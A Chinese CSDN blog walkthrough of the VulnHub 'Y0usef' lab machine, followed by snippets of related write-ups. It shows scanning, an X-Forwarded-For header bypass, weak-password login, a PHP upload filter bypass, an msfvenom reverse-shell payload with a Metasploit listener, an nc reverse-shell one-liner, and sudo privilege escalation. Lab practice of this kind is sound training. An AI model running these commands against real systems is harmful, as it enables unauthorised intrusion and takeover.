Y0usef靶场

最新推荐文章于 2024-10-13 15:55:06 发布
最新推荐文章于 2024-10-13 15:55:06 发布
阅读量265 收藏 1
点赞数
文章标签: php 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjxxxy/article/details/131229906
版权

一、靶场介绍

1.下载地址:https://www.vulnhub.com/entry/y0usef-1,624/
2.将靶机网络适配器改为桥接模式
3.VirtualBox中启动靶机

二、信息收集

1.主机发现

nmap -sP 192.168.3.0/24 | grep -B 2 -A 0 "VirtualBox"

在这里插入图片描述
2.端口扫描

nmap -sV -A -T4 -p- 192.168.3.61

在这里插入图片描述
3.目录扫描
在这里插入图片描述
4.网页访问,显示没有权限
在这里插入图片描述

三、渗透流程

1.尝试利用BP绕过,成功绕过

X-Forwarded-For: 127.0.0.1

在这里插入图片描述
2.放包,查看网页
在这里插入图片描述
3.尝试弱口令爆破,admin/admin登录成功,发现文件上传点
在这里插入图片描述
4.经过测试,发现可以上传.png文件,上传php文件,再通过BP修改文件类型
在这里插入图片描述
上传成功
在这里插入图片描述
浏览器中访问,成功
在这里插入图片描述
5.使用蚁剑连接
在这里插入图片描述
6.kali生成木马,上传到靶机

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.87 lport=7777 R > 2.php

在这里插入图片描述
在这里插入图片描述
7.kali开启msf监听

msfconsole
use exploit/multi/handler
set lhost 192.168.3.87  
set lport 7777
set payload php/meterpreter/reverse_tcp
run
shell
python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
8.在/home下的user.txt中发现一段加密后编码
在这里插入图片描述
9.对编码进行解码

user:yousef
pass:ypusef123

在这里插入图片描述
10.通过ssh登录yousef用户
在这里插入图片描述
11.查看当前用户权限

sudo -l

在这里插入图片描述
12.直接登录到root,提权成功
在这里插入图片描述

zjxxxy
关注
OSCP-3-5-y0usef(请求头Host Header注入漏洞、X-Forwarded-For:127.0.0.1)
墨痕诉清风的博客
08-27 160
如果应用程序信任 X-Forwarded-For 之类的 HTTP 请求标头来准确指定连接客户端的远程 IP 地址,则恶意客户端可以欺骗其 IP 地址(例如:X-Forwarded-For: 127.0.0.1)。尝试了一些基本技巧之后,我发现了一个 Host Header 漏洞,没有浪费我们让我们打开 burp 套件并添加一个 X-Forwarded-For: 127.0.0.1 请求头。上传png格式图片,bp删除后缀。访问index.php。...
VulnHub之y0usef靶场(1)
p_utao的博客
02-08 456
场信息: 地址:https://www.vulnhub.com/entry/y0usef-1,624/ 发布日期:2020年12月10日 难度:简单 目标:user.txt和root.txt 运行:VirtualBox(网络桥接) 信息收集 Web 服务器: Apache 2.4.10 编程语言: PHP 5.5.9 操作系统: Ubuntu nmap扫描一下 nmap 192.168.1.0/24 Nmap scan report for 192.168.1.50 Host is u
y0usef靶场详解
weixin_44681307的博客
07-16 592
靶机感悟:对于这个靶机并没有太多的难点,也没有的别多的绊子,就是猜测下一步是什么,耐心的去思考怎么才能进行到下一步。这样再访问我们就可以看到登陆框了,账户密码都是admin,随便试一试就出来密码了,也可以尝试爆破密码。在home目录下发现一个user.txt,里面是base64编码,这个看多了,一眼就知道是base64。就像这样,我这里反弹shell的ip地址写错了,重新修改了一下,发送后就上传成功了。发现有所有权限,直接su - 提权就可以了,很简单的一个靶机,跟CTF似的。抓包,在包头加上这个就可以。
Vulnhub--y0usef靶场漏洞多种方法详解复现
最新发布
2301_80386983的博客
10-13 968
rm /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 端口号 >/tmp/f。目录下,找到一个txt文件和一个目录,目录中没什么能利用的,双击点开txt文件中有一串编码字符,经验知是base64的编码(然后在kali中开启监听,nc -lvp 端口号,开启后,再访问一下页面,返回kali发现没有反弹成功。发现是普通用户,尝试提权,发现权限不够,尝试用python命令调用本地shell,,发现是普通用户,尝试提权,方法就跟刚才的本地提权一样的方法,这里我就不演示了。
vulnhub靶场-y0usef
qq_42947816的博客
03-08 995
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶机-Y0USEF: 1
臭nana的博客
12-17 1321
1、找到靶机ip:192.168.75.11 nmap -sn 192.168.75.0/24 2、扫描靶机端口 root@chounana:~# nmap -p- -A 192.168.75.11 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.75.11 Host is up (0.00038s latency). Not shown: 65533 closed ports PORT STATE
vulnhub靶场渗透实战(8-y0usef
随心所欲不逾矩
08-30 563
靶场难度:简单环境:Virtualbox搭建结果:拿到两个权限的flag。Virtualbox:192.168.3.2(桥接模式)kali:192.168.3.9(桥接模式)
VnlnHub y0usef
weixin_45682839的博客
09-11 923
涉及知识包括:端口服务探测、铭感目录搜集、WEB信息收集、403frobidden bypass绕过、弱口令爆破、文件上传及绕过、本地提权等
Y0usef打靶记录
wwd180的博客
06-15 316
实验主机:攻击机kali(192.168.3.131)靶机y0usef(192.168.3.99)实验目标:获取root权限 + flag实验网络:桥接。
VnlnHub-y0usef 1 靶场 打靶记录
lcc001114的博客
06-15 211
发现提权的命令都可以用!那这就简单了,直接用一个我经常用的sudo su命令进行提权。登录成功之后查看了各种可能藏flag的目录并未发现信息,查看root目录时提示说没有权限。上传php文件修改content-type为image/png(这个图没截上,用的别人的,改成下面框选的就行。尝试上传一个png文件,发现上传成功,服务器只允许上传png文件,我们看能否进行绕过。连接成功,打开蚁剑的虚拟终端,并在home目录下发现了第一个flag。那这就涉及到提权的操作了,sudo -l查看有哪些能用的提权命令。
Capacity mismatch for disk D:\xuniji\baji\y0usef\\y0usef-disk1.vmdk。
04-28
"Capacity mismatch for disk D:\xuniji\baji\y0usef\y0usef-disk1.vmdk" 是一个错误提示,意味着磁盘容量不匹配。这通常发生在虚拟机或虚拟磁盘的配置中。 可能的原因是,虚拟磁盘文件的容量与虚拟机配置中指定的...
打靶记录8——y0usef
Fab1an的博客
08-08 871
主机发现,端口扫描针对Web服务进行信息收集,查看源码,爆破路径针对的路径进行403 Bypass绕过目标服务器的检查和限制,成功访问到这个URL发现后台登录的页面存在弱口令发现文件上传漏洞,通过绕过目标服务器对文件上传的过滤机制利用上传的Webshell进行反弹shell,提权发现yousef账号,通过第一个flag获得SSH登录账号密码登录yousef账号后,发现它的sudo配置文件不严导致可以直接提权,切换成root账号。
vulnhub-y0usef
m0_62008601的博客
09-18 478
简单的渗透练习
Y0usef
qq_47078547的博客
06-15 213
实验主机:Os-Y0usef 靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限 得到flag难易程度:简单。
渗透测试学习笔记lab1【y0usef
铃的杂货铺分铺
09-27 1202
第一周, y0usef靶机的渗透学习笔记
Y0usef靶机
weixin_45691672的博客
06-16 257
实验主机:y0usef靶机一台/Kali linux攻击机一台y0usef靶机 IP:192.168.3.245Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
realtek sdk编译总结.zip_laughq61_pairfem_realtek sdk_realtek 编译_usef
07-13
在本文中,我们将深入探讨如何编译Realtek SDK(软件开发套件)源码,这是一个对硬件设备开发至关重要的步骤。Realtek SDK包含了用于开发基于Realtek芯片的软件应用程序的各种库、驱动和工具。编译过程涉及到配置...
Vmware虚拟机问题解决方案
errortwo的博客
01-28 3818
Vmware虚拟机问题解决方案 1. 运行虚拟机系统蓝屏 可能的原因有两个: 1). 虚拟机所在磁盘的空间不足 ; -------> 清理磁盘空间 。 2). 操作系统版本高, 需要适配新版本的Vmware ; ------> 卸载Vmware15版本, 安装Vmware16版本 。 2. 卸载Vmware步骤 1). 卸载已经安装的VMware [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PFg6BCEt-1643359118614)...
实战打靶集锦-028-y0usef
阿尔泰野狼的博客
03-25 1758
本文简要描述了博主的一次打靶经历,中间涉及403 forbidden绕过、上传文件格式检查绕过、php构建反弹shell、CVE-2015-1328提权等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值